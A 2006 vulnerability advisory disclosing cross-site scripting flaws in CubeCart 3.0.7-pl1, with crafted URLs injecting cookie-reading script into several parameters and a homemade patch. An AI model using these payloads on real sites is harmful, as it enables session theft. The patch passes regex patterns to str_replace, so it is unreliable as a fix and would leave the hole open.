################################################ CubeCart 3.0.7-pl1 multiple variable Cross site scripting Vendor url: www.cubecart.com bug report:http://bugs.cubecart.com/?do=details&id=459 Advisore:http://lostmon.blogspot.com/2006/01/ cubecart-307-pl1-indexphp-multiple.html. vendor notify:yes exploit avalable: yes ################################################ I recomended to all vendors to look this paper.. This is the new posible impact of XSS atacks: http://www.bindshell.net/papers/xssv.html CubeCart contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate some variables upon submission to 'index.php' scripts. This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server,leading to a loss of integrity. ############### VERSIONS ############### CubeCart 3.0.7-pl1 vulnerable. Other versions are posible vulnerables too ################# Timeline ################# Discovered: 24 dec 2005 vendor notify: 10-01-2006 Vendor response: Solution: Disclosure: 10-01-2006 Public disclosure:16-01-2006 ############### Examples: ############### http://victim]/cc3/cart.php?act=reg&redir=L3NpdGUvZGVt by9jYzMvaW5kZXgucGhwP3NlYXJjaFN0cj0lMjIlM0UlM0NzY3JpcH QlM0VhbGVydCUyOCUyOSUzQyUyRnNjcmlwdCUzRSZhbXA7YWN0PXZpZ XdDYXQmYW1wO1N1Ym1pdD1Hbw===%3D%22%3E%3Cscript %3Ealert%28document.cookie%29%3C%2Fscript%3E http://[victim]/cc3/cart.php?act=reg&redir==%3D%22%3E%3Cscript %3Ealert%28document.cookie%29%3C%2Fscript%3E http://[victim]cc3/index.php?searchStr=%3D%22%3E%3Cscript %3Ealert%28document.cookie%29%3C%2Fscript%3E&act=viewCat &Submit=Go http://[victim]cc3/index.php?act=login&redir=L3NpdG UvZGVtby9jYzMvaW5kZXgucGhwP2FjdD12aWV3RG9jJmFtcDtkb 2NJZD0x=%3D%22%3E%3Cscript %3Ealert%28document.cookie%29%3C%2Fscript%3E http://victim]/cc3/index.php?act=viewProd&productId=1"> http://victim]/cc3/index.php?act=viewDoc&docId=3"> http://victim]/cc3/index.php?act=viewProd"> http://victim]/cc3/index.php?act=viewCat&catId=1"> http://victim]/cc3/index.php?act=viewCat&catId=saleItems"> http://victim]/cc3/index.php?searchStr=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&act=viewCat http://victim]/cc3/index.php?act=viewDoc&docId=1"> ################# User field XSS ################# Go to http://victim]/cc3/index.php?act=login and inser in the username field this: "> ############# SOLUTION ############# no solution was available at this time currently i found a posible fix : if we look in includes/functions.inc.php for function treatGet($text) arround line 85 i change the original code to this other. it removes all posible html code inserted ... function treatGet($text){ $text= str_replace(array ("@]*?>.*?@si", "@<[\/\!]*?[^<>]*?>@si", "@([\r\n])[\s]+@", "@&(quot|#34);@i", "@&(amp|#38);@i", "@&(lt|#60);@i", "@&(gt|#62);@i", "@&(nbsp|#160);@i", "@&(iexcl|#161);@i", "@&(cent|#162);@i", "@&(pound|#163);@i", "@&(copy|#169);@i", "@&#(\d+);@e"),"",$text); return $text; } close, save and upload the new file... arround line 80 in index.php we found : if(isset($_GET['searchStr'])){ $body->assign("SEARCHSTR",treatGet($_GET['searchStr'])); } else { $body->assign("SEARCHSTR",""); } this can be replace for: $_GET['searchStr'] = treatGet($_GET['searchStr']); if(isset($_GET['searchStr'])){ $body->assign("SEARCHSTR",$_GET['searchStr']); } else { $body->assign("SEARCHSTR",""); } --------------------------------------- close,save and upload it. this only fix searchStr param , but you can search in the source code for fix the other functions.... ##################### €nd ######################## Thnx to estrella to be my ligth Thnx to all manglers of http://www.osvdb.org -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ -- La curiosidad es lo que hace mover la mente....